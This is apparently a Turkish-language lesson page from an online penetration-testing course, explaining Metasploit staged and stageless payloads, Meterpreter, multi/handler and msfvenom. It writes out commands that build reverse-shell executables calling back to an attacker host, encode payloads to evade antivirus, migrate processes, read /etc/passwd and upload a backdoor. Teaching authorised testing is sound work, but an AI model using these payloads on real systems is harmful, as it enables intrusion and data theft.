Cyber Security Academy · Ders

Yükler: Aşamalı ve Aşamasız, Meterpreter

Bir senaryo için doğru yükü seçin ve istismar sonrası işlemler için Meterpreter kullanın.

3. ders / 413 adım

Yükler: Aşamalı ve Aşamasız, Meterpreter, CoddyKit'te ücretsiz bir Cyber Security Academy dersidir. Bu, 4 dersinin 3. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cyber Security Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cyber Security Academy kursu toplamda 4 dersten oluşur.

Yük Nedir?

Yük, başarılı bir istismardan sonra hedefte çalışan koddur. Saldırganın ne elde edeceğini tanımlar: bir kabuk, komut çalıştırma, dosya erişimi veya Meterpreter gibi tüm özelliklere sahip bir ajan.

Aşamalı ve Aşamasız Yükler

Stageless yükler (/) her şeyi tek bir ikili dosyada içerir; daha büyüktür ancak daha basittir ve ilk gönderimden sonra ağ üzerinden geri bağlantı gerekmez. Staged yükler (//) önce küçük bir başlatıcı gönderir; bu başlatıcı ikinci aşamayı işleyiciden indirir.

# Stageless (single slash naming):
windows/x64/shell_reverse_tcp

# Staged (double slash naming):
windows/x64/shell/reverse_tcp
#                 ^
#                 stage 2 downloaded after stager connects

Her Birini Ne Zaman Kullanmalı?

İlk istismardan sonra hedefin internet veya işleyici erişimi yoksa stageless kullanın; yük kendi kendine yeterli olmalıdır. Daha küçük bir ilk yük istediğinizde ve güvenilir bir işleyici bağlantınız olduğunda staged kullanın.

Meterpreter'e Genel Bakış

Meterpreter, Metasploit'in gelişmiş yüküdür; tamamen bellekte çalışır, şifreli iletişim kullanır ve dosya sistemine erişim, süreç taşıma, tuş kaydı, ekran görüntüsü alma ve ara sistem üzerinden geçiş gibi zengin bir programlama arayüzü sağlar.

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > run

Meterpreter Komutları

İstismar sonrası için temel Meterpreter komutları: sistem bilgileri, süreç listesi, dosya işlemleri ve ağ işlemleri.

meterpreter > sysinfo          # system information
meterpreter > getuid           # current user
meterpreter > ps               # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell            # drop to OS shell

Süreç Taşıma

Meterpreter sürecini daha kararlı veya daha az şüpheli bir sürece taşıyın (örneğin Windows'ta explorer.exe). Daha yüksek ayrıcalıklı bir sürece taşıma, ayrıcalıkları da yükseltebilir.

meterpreter > ps
meterpreter > migrate 1234     # migrate to PID 1234

# Migrate to explorer.exe for stability
# Avoids termination if original process exits

msfvenom ile Yük Oluşturma

msfvenom, yetkili sınamalarda kimlik avı, USB bırakma saldırıları veya web kabukları aracılığıyla gönderilmek üzere bağımsız yük dosyaları (EXE, ELF, APK ve kabuk kodu) oluşturur.

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f exe -o payload.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f elf -o payload.elf

Kabukları Yakalamak için multi/handler

multi/handler yardımcı modülü ters kabuk bağlantılarını yakalar. Yükü göndermeden önce, msfvenom'da kullandığınız yükü, LHOST'u ve LPORT'u kullanarak yapılandırın.

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j      # run as background job

Kodlama ve Savunmaları Aşmanın Temelleri

msfvenom kodlayıcıları, temel imza tabanlı AV algılamasından kaçınmak için yükleri gizleyebilir. Not: modern EDR davranışsal algılama kullanır; tek başına kodlayıcılar gelişmiş savunmalara karşı yeterli değildir.

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -e x64/xor_dynamic -i 5 \
  -f exe -o encoded_payload.exe

Bağlama ve Ters Bağlantı Yükleri

Ters bağlantı yükleri hedeften saldırgana bağlanır (NAT ve güvenlik duvarları için daha uygundur). Bağlama yükleri hedefte dinleme yapar; saldırgan içeri bağlanır. Çoğu senaryoda ters bağlantı tercih edilir.

Savunmacıların Yükleri Algılaması

Savunmacılar Meterpreter'i şu yollarla algılar: ağ imzaları (C2 trafik örüntüleri), bellek taraması (yansıtmalı DLL enjeksiyonu kalıntıları) ve davranış analizi (süreç boşaltma, olağandışı üst-alt süreç ilişkileri).

Hızlı Kontrol

Metasploit'te aşamalı bir yükü aşamasız bir yükten ayıran nedir?

Özet: Yükler ve Meterpreter

Küçük bir ilk ayak izi için aşamalı, kendi kendine yeterli gönderim için aşamasız yükleri seçin. Meterpreter, istismar sonrası için en yetenekli yüktür: bellekte çalışır, şifrelenmiştir ve genişletilebilir. Bağımsız ikili dosyalar oluşturmak için msfvenom'u kullanın ve geri bağlantıları yakalamak için multi/handler'ı her zaman yapılandırın.

Başlamak ücretsiz

Yapay zeka eğitmeniyle Cyber Security Academy öğren — ücretsiz

Tarayıcında gerçek kod yaz ve çalıştır, 7/24 yapay zeka eğitmeninden anında yardım al; web'de ya da uygulamada kaldığın yerden devam et.

Kurslar
76
Dersler
303

Sıkça Sorulan Sorular

“Yükler: Aşamalı ve Aşamasız, Meterpreter” dersi ücretsiz mi?

Evet — “Yükler: Aşamalı ve Aşamasız, Meterpreter” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cyber Security Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cyber Security Academy kursu toplamda 4 dersten oluşur.

“Yükler: Aşamalı ve Aşamasız, Meterpreter” dersinde ne öğreneceğim?

Bir senaryo için doğru yükü seçin ve istismar sonrası işlemler için Meterpreter kullanın. Cyber Security Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Cyber Security Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Cyber Security Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 3. dersidir.

“Yükler: Aşamalı ve Aşamasız, Meterpreter” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Cyber Security Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Cyber Security Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. Metasploit Mimarisi ve msfconsole
  2. Bilinen Bir Güvenlik Açığını İstismar Etme
  3. Yükler: Aşamalı ve Aşamasız, Meterpreter
  4. İstismar Sonrası: Pivot ve Kalıcılık
← Cyber Security Academy Sayfasına Dön